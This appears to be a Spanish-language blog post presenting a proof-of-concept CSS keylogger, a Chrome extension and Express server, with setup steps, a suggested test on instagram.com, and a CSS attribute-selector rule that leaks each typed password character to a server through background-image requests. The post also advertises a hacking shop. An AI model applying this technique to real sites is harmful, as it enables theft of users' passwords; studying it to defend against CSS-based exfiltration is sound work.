keylogger-CSS : Extensión en chrome y servidor Express que explota las capacidades de keylogging de CSS.

0
3395
views

Extensión de Chrome y servidor Express que explota las capacidades de keylogging de CSS.

Modo de uso

Configurar la extensión de Chrome

  • Descargar repositorio git clone https://github.com/maxchehab/CSS-Keylogging
  • Visite chrome: // extensiones en su navegador (o abra el menú de Chrome haciendo clic en el ícono a la derecha de Omnibox: El icono del menú tiene tres barras horizontales y seleccione Extensiones en el menú Más herramientas para llegar al mismo lugar )
  • Asegúrese de que esté marcada la casilla de verificación Modo de desarrollador en la esquina superior derecha.
  • Haga clic en Cargar extensión desempaquetada … para abrir un cuadro de diálogo de selección de archivos.
  • Seleccione css-keylogger-extension en el directorio que descargó este repositorio.

Configuración de Express server

  • yarn
  • yarn start

Haxking l33t passw0rds

  • Abra un sitio web que utiliza un framework de componentes controlados como React. https://instagram.com.
  • Presione la extensión C en la esquina superior derecha de cualquier página web.
  • Escribe tu contraseña.
  • Tu contraseña debe ser capturada por el servidor express.

Cómo funciona

Este ataque es realmente simple. Utilizando los selectores de atributos CSS, uno puede solicitar recursos de un servidor externo bajo la premisa de cargar una imagen de fondo.
Por ejemplo, el siguiente CSS seleccionará todas las entradas con un tipo que equivale a la contraseña y un valor que termina con a. A continuación, intentará cargar una imagen desde http: // localhost: 3000 / a.

user@computer:$
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}

Usando un script simple uno puede crear un archivo CSS que enviará una solicitud personalizada para cada carácter ASCII.

Descarga CSS-Keylogging

No olvides visitar nuestra hacking shop

shop